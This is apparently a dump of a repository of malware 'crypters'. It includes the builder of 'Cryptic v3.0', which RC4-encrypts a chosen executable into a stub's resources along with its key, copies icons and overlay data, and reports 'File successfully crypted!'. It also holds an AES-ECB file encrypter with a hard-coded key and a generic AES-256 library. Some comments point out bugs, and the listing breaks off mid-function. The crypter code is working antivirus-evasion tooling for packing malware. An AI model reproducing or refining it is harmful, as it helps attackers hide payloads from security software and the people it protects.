            HANDLE hFile;
            hFile = CreateFile(szEFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
            if(hFile == INVALID_HANDLE_VALUE)
            {
                free(lpBuffer);
                MessageBox(hDlg, "Could not create file!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            DWORD dwBytesWritten;
            if(WriteFile(hFile, lpBuffer, dwRsrcSize, &dwBytesWritten, NULL) == 0)
            {
                CloseHandle(hFile);
                free(lpBuffer);
                MessageBox(hDlg, "Could not write to file!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            CloseHandle(hFile);
            free(lpBuffer);
            if(IsDlgButtonChecked(hDlg, IDC_ADDICON) == BST_CHECKED)
            {
                if(AddIcon(szIFileName, szEFileName) == FALSE)
                {
                    MessageBox(hDlg, "Could add icon!", "Cryptic", MB_ICONERROR);
                    EnableControls(hDlg, TRUE);
                    return TRUE;
                }
            }
            // FALSE = keep the resources already present in the stub.
            HANDLE hUpdate;
            hUpdate = BeginUpdateResource(szEFileName, FALSE);
            if(hUpdate == NULL)
            {
                MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            // RT_RCDATA 150: the whole original file. RC4() transforms
            // lpFileBuffer in place as part of evaluating the argument list.
            if(UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(150), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), RC4(lpFileBuffer, lpKey, dwFileSize, 15), dwFileSize) == FALSE)
            {
                MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            // RT_RCDATA 151: the key itself, stored unprotected.
            if(UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(151), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), &lpKey[0], 15) == FALSE)
            {
                MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            if(EndUpdateResource(hUpdate, FALSE) == FALSE)
            {
                MessageBox(hDlg, "Could add resource!", "Cryptic", MB_ICONERROR);
                EnableControls(hDlg, TRUE);
                return TRUE;
            }
            // Second pass with the same key undoes the first one, so the
            // buffer holds the original bytes again for the overlay check.
            RC4(lpFileBuffer, lpKey, dwFileSize, 15);
            // Last section header. The offset assumes the section table
            // follows a full-size IMAGE_NT_HEADERS; SizeOfOptionalHeader is
            // not consulted.
            pish = (PIMAGE_SECTION_HEADER)&lpFileBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * (pinh->FileHeader.NumberOfSections - 1)];
            // Bytes after the end of the last section ("EOF data") are
            // appended to the output file as they are, without encryption.
            if(dwFileSize > (pish->PointerToRawData + pish->SizeOfRawData))
            {
                MessageBox(hDlg, "EOF data found!", "Cryptic", MB_OK);
                hFile = CreateFile(szEFileName, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
                if(hFile == INVALID_HANDLE_VALUE)
                {
                    MessageBox(hDlg, "Could not open file!", "Cryptic", MB_ICONERROR);
                    EnableControls(hDlg, TRUE);
                    return TRUE;
                }
                SetFilePointer(hFile, 0, NULL, FILE_END);
                // NOTE(review): the source offset has an extra "+ 1" while the
                // length does not, so the first overlay byte is skipped and
                // the read runs one byte past the end of lpFileBuffer.
                if(WriteFile(hFile, &lpFileBuffer[pish->PointerToRawData + pish->SizeOfRawData + 1], dwFileSize - (pish->PointerToRawData + pish->SizeOfRawData), &dwBytesWritten, NULL) == 0)
                {
                    CloseHandle(hFile);
                    MessageBox(hDlg, "Could not write to file!", "Cryptic", MB_ICONERROR);
                    EnableControls(hDlg, TRUE);
                    return TRUE;
                }
                CloseHandle(hFile);
            }
            MessageBox(hDlg, "File successfully crypted!", "Cryptic", MB_ICONINFORMATION);
            EnableControls(hDlg, TRUE);
            break;
        case IDC_ABOUT:
            MessageBox(hDlg, "Cryptic v3.0\nCoded by Tughack", "About", MB_ICONINFORMATION);
            break;
        case IDC_EXIT:
            EndDialog(hDlg, 0);
            break;
        }
    }
    return FALSE;
}
465 |
// Program entry point: allows a single running instance, identified by the
// named mutex "m_Cryptic", then shows the main dialog modally.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // If the mutex can already be opened, another instance owns it: exit quietly.
    HANDLE hExisting = OpenMutex(MUTEX_ALL_ACCESS, FALSE, "m_Cryptic");
    if(hExisting != NULL)
    {
        return 0;
    }

    // First instance: create the mutex; it is held until the process exits.
    HANDLE hMutex = CreateMutex(NULL, FALSE, "m_Cryptic");
    (void)hMutex;

    hInst = hInstance;
    DialogBox(hInst, MAKEINTRESOURCE(IDD_MAIN), NULL, (DLGPROC)DlgProc);
    return 0;
}
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by Cryptic.rc
4 | //
5 | #define IDR_24 1
6 | #define IDD_MAIN 101
7 | #define IDB_MAIN 102
8 | #define IDI_MAIN 103
9 | #define IDI_EXE 104
10 | #define IDR_STUB 105
11 | #define IDC_FILE 1000
12 | #define IDC_BROWSE 1001
13 | #define IDC_BACKUP 1002
14 | #define IDC_ADDICON 1003
15 | #define IDC_BUILD 1004
16 | #define IDC_ABOUT 1005
17 | #define IDC_EXIT 1006
18 | #define IDC_ICONIMG 1007
19 |
20 | // Next default values for new objects
21 | //
22 | #ifdef APSTUDIO_INVOKED
23 | #ifndef APSTUDIO_READONLY_SYMBOLS
24 | #define _APS_NEXT_RESOURCE_VALUE 106
25 | #define _APS_NEXT_COMMAND_VALUE 40001
26 | #define _APS_NEXT_CONTROL_VALUE 1008
27 | #define _APS_NEXT_SYMED_VALUE 101
28 | #endif
29 | #endif
30 |
--------------------------------------------------------------------------------
/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/skull.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/Cryptic v3.0/Cryptic v3.0/Cryptic v3.0/skull.ico
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual C++ Express 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MyEncrypter", "MyEncrypter\MyEncrypter.vcxproj", "{06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Debug|Win32.Build.0 = Debug|Win32
14 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Release|Win32.ActiveCfg = Release|Win32
15 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyEncrypter/MyEncrypter.suo
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include
3 | #include
4 | #include "aes256.h"
5 |
// Command-line encrypter: reads the file named by argv[1], encrypts it in
// place in memory with AES-256 and writes the result to "encrypted.dat" in
// the directory of this executable (or the current directory when argv[0]
// contains no backslash).
//
// Properties visible in the code that matter when analysing its output:
//  - the key is a fixed array compiled into the program, the same for every
//    run; all 32 bytes are printable ASCII, so it appears as a string constant;
//  - each 16-byte block is encrypted independently (ECB), so equal plaintext
//    blocks give equal ciphertext blocks;
//  - only lSize/16 whole blocks are processed; the trailing lSize % 16 bytes
//    are written out unencrypted.
int main (int argc, char *argv[])
{
    if (argv[1] == NULL) return 0;

    //*********** open file to encrypt ************
    // NOTE(review): fopen, ftell, malloc and fread results are all used
    // without checks; a missing file makes fseek operate on a NULL stream.
    FILE *inFile = fopen(argv[1], "rb");
    fseek(inFile , 0 , SEEK_END);
    unsigned long lSize = ftell(inFile);
    rewind(inFile);
    unsigned char *text = (unsigned char*) malloc (sizeof(unsigned char)*lSize);
    fread(text,1,lSize,inFile);
    fclose (inFile);
    //*********************************************

    puts("Encrypting...");

    //************ AES encryption ********************
    // Static 256-bit key shared by every file this program processes.
    unsigned char aesKey[32] = {
        0x53, 0x28, 0x40, 0x6e, 0x2f, 0x64, 0x63, 0x5d, 0x2d, 0x61, 0x77, 0x40, 0x76, 0x71, 0x77, 0x28,
        0x74, 0x61, 0x7d, 0x66, 0x61, 0x73, 0x3b, 0x5d, 0x66, 0x6d, 0x3c, 0x3f, 0x7b, 0x66, 0x72, 0x36
    };

    unsigned char *buf;

    aes256_context ctx;
    aes256_init(&ctx, aesKey);

    // One independent ECB call per whole 16-byte block; integer division
    // leaves any final partial block untouched.
    for (unsigned long i = 0; i < lSize/16; i++) {
        buf = text + (i * 16);
        aes256_encrypt_ecb(&ctx, buf);
    }

    aes256_done(&ctx);
    //************************************************

    //************* write encrypted data to file ***********
    // This NULL check comes after text has already been written through above.
    if (text != NULL) {
        char absPath[500];
        if (strrchr(argv[0], '\\') == NULL) {
            strcpy (absPath, "encrypted.dat");
        } else {
            // Truncate argv[0] after its last backslash to get the directory.
            // NOTE(review): strcpy/strcat into absPath are unbounded.
            char* path = argv[0];
            path[strrchr(argv[0], '\\') - path + 1] = 0;
            strcpy (absPath, path);
            strcat (absPath,"encrypted.dat");
        }
        FILE *outFile = fopen(absPath, "wb");
        fwrite(text, lSize, 1, outFile);
        fclose (outFile);
    }
    free(text);
    //******************************************************

    puts("done");

    return 0;
} /* main */
63 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {06C4BA9D-81A5-472D-AB6A-FA43BBC4EB89}
15 | Win32Proj
16 | MyEncrypter
17 |
18 |
19 |
20 | Application
21 | true
22 | MultiByte
23 |
24 |
25 | Application
26 | false
27 | true
28 | MultiByte
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 | true
42 |
43 |
44 | false
45 |
46 |
47 |
48 | Use
49 | Level3
50 | Disabled
51 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
52 | MultiThreadedDebug
53 |
54 |
55 | Console
56 | true
57 |
58 |
59 |
60 |
61 | Level3
62 | Use
63 | MaxSpeed
64 | true
65 | true
66 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
67 | MultiThreaded
68 |
69 |
70 | Console
71 | true
72 | true
73 | true
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 | Create
86 | Create
87 |
88 |
89 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Headerdateien
20 |
21 |
22 | Headerdateien
23 |
24 |
25 | Headerdateien
26 |
27 |
28 |
29 |
30 | Quelldateien
31 |
32 |
33 | Quelldateien
34 |
35 |
36 | Quelldateien
37 |
38 |
39 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/MyEncrypter.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyEncrypter/MyEncrypter/aes256.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #include "stdafx.h"
21 | #include "aes256.h"
22 |
23 | #define F(x) (((x)<<1) ^ ((((x)>>7) & 1) * 0x1b))
24 | #define FD(x) (((x) >> 1) ^ (((x) & 1) ? 0x8d : 0))
25 |
26 | // #define BACK_TO_TABLES
27 | #ifdef BACK_TO_TABLES
28 |
29 | const uint8_t sbox[256] = {
30 | 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5,
31 | 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,
32 | 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0,
33 | 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,
34 | 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc,
35 | 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,
36 | 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a,
37 | 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,
38 | 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0,
39 | 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,
40 | 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
41 | 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,
42 | 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85,
43 | 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,
44 | 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5,
45 | 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,
46 | 0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17,
47 | 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73,
48 | 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88,
49 | 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb,
50 | 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c,
51 | 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79,
52 | 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9,
53 | 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08,
54 | 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6,
55 | 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a,
56 | 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e,
57 | 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e,
58 | 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94,
59 | 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf,
60 | 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68,
61 | 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
62 | };
63 | const uint8_t sboxinv[256] = {
64 | 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38,
65 | 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb,
66 | 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87,
67 | 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb,
68 | 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d,
69 | 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e,
70 | 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2,
71 | 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25,
72 | 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16,
73 | 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92,
74 | 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda,
75 | 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84,
76 | 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a,
77 | 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06,
78 | 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02,
79 | 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b,
80 | 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea,
81 | 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73,
82 | 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85,
83 | 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e,
84 | 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89,
85 | 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b,
86 | 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20,
87 | 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4,
88 | 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31,
89 | 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f,
90 | 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d,
91 | 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef,
92 | 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0,
93 | 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61,
94 | 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26,
95 | 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
96 | };
97 |
98 | #define rj_sbox(x) sbox[(x)]
99 | #define rj_sbox_inv(x) sboxinv[(x)]
100 |
101 | #else /* tableless subroutines */
102 |
103 | /* -------------------------------------------------------------------------- */
/* Anti-logarithm in GF(2^8) to the base 3: returns 3^x under the AES
 * reduction polynomial (0x1b). */
uint8_t gf_alog(uint8_t x)
{
    uint8_t power = 1;

    for (uint8_t step = 0; step < x; step++) {
        /* power *= 3, i.e. (power * 2) ^ power with reduction on overflow */
        uint8_t doubled = (uint8_t)(power << 1);
        if (power & 0x80) {
            doubled ^= 0x1b;
        }
        power = (uint8_t)(doubled ^ power);
    }

    return power;
} /* gf_alog */
112 |
113 | /* -------------------------------------------------------------------------- */
/* Logarithm in GF(2^8) to the base 3: returns the smallest i with 3^i == x.
 * For x == 0, which has no logarithm, the search runs through all 256
 * counter values and returns 0 once the counter wraps. */
uint8_t gf_log(uint8_t x)
{
    uint8_t power = 1;
    uint8_t exponent = 0;

    for (;;) {
        if (power == x) {
            return exponent;
        }
        /* power *= 3 with reduction by 0x1b */
        uint8_t doubled = (uint8_t)(power << 1);
        if (power & 0x80) {
            doubled ^= 0x1b;
        }
        power = (uint8_t)(doubled ^ power);

        exponent++;
        if (exponent == 0) {
            /* counter wrapped: nothing matched */
            return exponent;
        }
    }
} /* gf_log */
125 |
126 |
127 | /* -------------------------------------------------------------------------- */
/* Multiplicative inverse in GF(2^8), computed as 3^(255 - log3(x)).
 * Zero has no inverse and maps to zero. */
uint8_t gf_mulinv(uint8_t x)
{
    if (x == 0) {
        return 0;
    }
    return gf_alog(255 - gf_log(x));
} /* gf_mulinv */
132 |
133 | /* -------------------------------------------------------------------------- */
/* Forward S-box computed on the fly: field inverse, then the XOR of the
 * value with its four successive left rotations, then XOR 0x63. */
uint8_t rj_sbox(uint8_t x)
{
    uint8_t rotated = gf_mulinv(x);
    uint8_t mixed = rotated;

    for (int turn = 0; turn < 4; turn++) {
        rotated = (uint8_t)((rotated << 1) | (rotated >> 7));
        mixed ^= rotated;
    }

    return (uint8_t)(mixed ^ 0x63);
} /* rj_sbox */
144 |
145 | /* -------------------------------------------------------------------------- */
/* Inverse S-box computed on the fly: remove the 0x63 constant, XOR together
 * the value rotated left by 1, 3 and 6 bits, then take the field inverse. */
uint8_t rj_sbox_inv(uint8_t x)
{
    const uint8_t unmasked = (uint8_t)(x ^ 0x63);
    const uint8_t rot1 = (uint8_t)((unmasked << 1) | (unmasked >> 7));
    const uint8_t rot3 = (uint8_t)((rot1 << 2) | (rot1 >> 6));
    const uint8_t rot6 = (uint8_t)((rot3 << 3) | (rot3 >> 5));

    return gf_mulinv((uint8_t)(rot1 ^ rot3 ^ rot6));
} /* rj_sbox_inv */
156 |
157 | #endif
158 |
159 | /* -------------------------------------------------------------------------- */
/* Multiplies x by 2 in GF(2^8): shift left, and reduce with 0x1b when the
 * top bit was set. */
uint8_t rj_xtime(uint8_t x)
{
    uint8_t doubled = (uint8_t)(x << 1);

    if (x & 0x80) {
        doubled ^= 0x1b;
    }
    return doubled;
} /* rj_xtime */
164 |
165 | /* -------------------------------------------------------------------------- */
/* SubBytes: replaces each of the 16 state bytes with its S-box value. */
void aes_subBytes(uint8_t *buf)
{
    for (int idx = 15; idx >= 0; idx--) {
        buf[idx] = rj_sbox(buf[idx]);
    }
} /* aes_subBytes */
172 |
173 | /* -------------------------------------------------------------------------- */
/* InvSubBytes: replaces each of the 16 state bytes with its inverse S-box
 * value. */
void aes_subBytes_inv(uint8_t *buf)
{
    for (int idx = 15; idx >= 0; idx--) {
        buf[idx] = rj_sbox_inv(buf[idx]);
    }
} /* aes_subBytes_inv */
180 |
181 | /* -------------------------------------------------------------------------- */
/* AddRoundKey: XORs the first 16 bytes of key into the 16-byte state. */
void aes_addRoundKey(uint8_t *buf, uint8_t *key)
{
    for (int idx = 15; idx >= 0; idx--) {
        buf[idx] ^= key[idx];
    }
} /* aes_addRoundKey */
188 |
189 | /* -------------------------------------------------------------------------- */
/* AddRoundKey that also copies the full 32-byte key into cpk: the first
 * 16 key bytes are XORed into the state, and all 32 are duplicated. */
void aes_addRoundKey_cpy(uint8_t *buf, uint8_t *key, uint8_t *cpk)
{
    for (int idx = 15; idx >= 0; idx--) {
        cpk[idx] = key[idx];
        buf[idx] ^= cpk[idx];
        cpk[16 + idx] = key[16 + idx];
    }
} /* aes_addRoundKey_cpy */
196 |
197 |
198 | /* -------------------------------------------------------------------------- */
/* ShiftRows on the column-major 16-byte state: row r is rotated left by r
 * positions. Expressed as a lookup of where each output byte comes from. */
void aes_shiftRows(uint8_t *buf)
{
    static const uint8_t source_of[16] = {
        0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11
    };
    uint8_t before[16];

    for (int idx = 0; idx < 16; idx++) {
        before[idx] = buf[idx];
    }
    for (int idx = 0; idx < 16; idx++) {
        buf[idx] = before[source_of[idx]];
    }
} /* aes_shiftRows */
209 |
210 | /* -------------------------------------------------------------------------- */
/* InvShiftRows on the column-major 16-byte state: row r is rotated right by
 * r positions. Expressed as a lookup of where each output byte comes from. */
void aes_shiftRows_inv(uint8_t *buf)
{
    static const uint8_t source_of[16] = {
        0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3
    };
    uint8_t before[16];

    for (int idx = 0; idx < 16; idx++) {
        before[idx] = buf[idx];
    }
    for (int idx = 0; idx < 16; idx++) {
        buf[idx] = before[source_of[idx]];
    }
} /* aes_shiftRows_inv */
221 |
222 | /* -------------------------------------------------------------------------- */
/* MixColumns: transforms each 4-byte column of the state in place, using
 * only XOR and doubling in GF(2^8). */
void aes_mixColumns(uint8_t *buf)
{
    for (int col = 0; col < 4; col++) {
        uint8_t *cell = buf + 4 * col;
        const uint8_t a = cell[0];
        const uint8_t b = cell[1];
        const uint8_t c = cell[2];
        const uint8_t d = cell[3];
        const uint8_t sum = (uint8_t)(a ^ b ^ c ^ d);

        cell[0] ^= sum ^ rj_xtime(a ^ b);
        cell[1] ^= sum ^ rj_xtime(b ^ c);
        cell[2] ^= sum ^ rj_xtime(c ^ d);
        cell[3] ^= sum ^ rj_xtime(d ^ a);
    }
} /* aes_mixColumns */
235 |
236 | /* -------------------------------------------------------------------------- */
/*
 * Inverse MixColumns: undoes aes_mixColumns on each 4-byte column of the
 * state, again built only from XORs and rj_xtime doublings.
 */
void aes_mixColumns_inv(uint8_t *buf)
{
    uint8_t col;

    for (col = 0; col < 16; col += 4) {
        uint8_t *s = buf + col;
        /* snapshot the column first: every output byte uses the old values */
        const uint8_t a = s[0], b = s[1], c = s[2], d = s[3];
        const uint8_t sum = a ^ b ^ c ^ d;
        const uint8_t dbl = rj_xtime(sum);
        /* correction shared by bytes 0/2 and by bytes 1/3 respectively */
        const uint8_t even = sum ^ rj_xtime(rj_xtime(dbl ^ a ^ c));
        const uint8_t odd = sum ^ rj_xtime(rj_xtime(dbl ^ b ^ d));

        s[0] ^= even ^ rj_xtime(a ^ b);
        s[1] ^= odd ^ rj_xtime(b ^ c);
        s[2] ^= even ^ rj_xtime(c ^ d);
        s[3] ^= odd ^ rj_xtime(d ^ a);
    }
} /* aes_mixColumns_inv */
251 |
252 | /* -------------------------------------------------------------------------- */
/*
 * Advance the 32-byte working key `k` by one key-schedule step, in place,
 * and step the round constant `*rc` forward with F().
 */
void aes_expandEncKey(uint8_t *k, uint8_t *rc)
{
    uint8_t n;

    /* first word: substituted, rotated last word plus the round constant */
    k[0] ^= rj_sbox(k[29]) ^ (*rc);
    k[1] ^= rj_sbox(k[30]);
    k[2] ^= rj_sbox(k[31]);
    k[3] ^= rj_sbox(k[28]);
    *rc = F(*rc);

    /* bytes 4..15: each byte absorbs the (already updated) byte 4 below it */
    for (n = 4; n < 16; n++) {
        k[n] ^= k[n - 4];
    }

    /* bytes 16..19: substituted copy of bytes 12..15, no rotation */
    for (n = 16; n < 20; n++) {
        k[n] ^= rj_sbox(k[n - 4]);
    }

    /* bytes 20..31: same chaining as the lower half */
    for (n = 20; n < 32; n++) {
        k[n] ^= k[n - 4];
    }
} /* aes_expandEncKey */
274 |
275 | /* -------------------------------------------------------------------------- */
/*
 * Step the 32-byte working key `k` one key-schedule step backwards, in
 * place, and step the round constant `*rc` backwards with FD(). The stages
 * run in the reverse order of aes_expandEncKey.
 */
void aes_expandDecKey(uint8_t *k, uint8_t *rc)
{
    uint8_t n;

    /* bytes 31..20: walk downwards so each byte reads a not-yet-undone
     * neighbour 4 below it */
    for (n = 31; n >= 20; n--) {
        k[n] ^= k[n - 4];
    }

    /* bytes 16..19: remove the substituted copy of bytes 12..15 */
    for (n = 16; n < 20; n++) {
        k[n] ^= rj_sbox(k[n - 4]);
    }

    /* bytes 15..4: same downward walk for the lower half */
    for (n = 15; n >= 4; n--) {
        k[n] ^= k[n - 4];
    }

    /* first word: the round constant is stepped back before it is used */
    *rc = FD(*rc);
